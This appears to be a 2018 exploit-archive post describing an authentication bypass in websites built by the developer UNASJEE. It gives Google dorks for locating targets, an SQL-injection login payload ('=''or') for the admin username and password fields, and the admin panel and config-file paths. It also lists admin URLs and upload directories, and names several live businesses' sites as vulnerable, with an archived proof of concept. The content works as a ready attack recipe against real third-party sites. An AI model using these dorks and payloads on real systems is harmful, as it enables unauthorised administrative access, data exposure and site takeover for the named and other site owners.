facebook facebook twitter rss

Design and Developed By UNASJEE Authentication Bypass Vulnerability

Author: KingSkrupellos , Published: 11-10-2018
# Exploit Title : Design and Developed By UNASJEE Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vendor Homepage : unasjee.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 - [ Authentication Bypass Issues ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090208
# Cyberizm : cyberizm.org/cyberizm-design-by-unasjee-authentication-bypass-vuln.html

#################################################################################################

# Google Dork :

intext:''Designed & Developed by: UNASJEE''

intext:''Developed by: UNASJEE''

# Admin Control Panel Path : /admincp/index.php

# Exploit :

Admin Username : '=''or'

Admin Password : '=''or'

# Configuration File Directory Path : /admincp/config.inc

# Useable Admin Control Panel URL Links =>

/admincp/mmainsections.php
/admincp/edititem.php
/admincp/allproducts2.php?sort=isNew
/admincp/allproducts2.php?sort=isSug
/admincp/allproducts.php?sort=order%20by%20ItmName
/admincp/allproducts.php?sort=order%20by%20ArtNo
/admincp/allproducts2.php?sort=soption
/admincp/vinquiries.php
/admincp/mnews.php
/admincp/editemail2.php
/admincp/newsletters.php
/admincp/links.php
/admincp/sendnewsletters.php
/admincp/changepass.php
/admincp/profile.php
/admincp/contact2.php
/admincp/f-view.php
/admincp/ani.php

# Directory File Paths =>

/admincp/sdata/itmimgs/....
/admincp/sdata/banner/....
/admincp/sdata/fviewimgs/...
/admincp/sdata/itmimgs/...
/admincp/sdata/mainimgs/...
/admincp/sdata/mimgs/...
/admincp/sdata/msecimgs/...
/admincp/sdata/nextimgs/...
/admincp/sdata/secbanner/...
/admincp/sdata/secimgs/..
/admincp/sdata/subimgs/...

#################################################################################################

# Example Vulnerable Sites =>

tbshandtools.com/admincp/index.php => [ Proof of Concept ] => archive.is/3fTzD

chableather.com/admincp/index.php

fadensports.com/admincp/config.inc

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :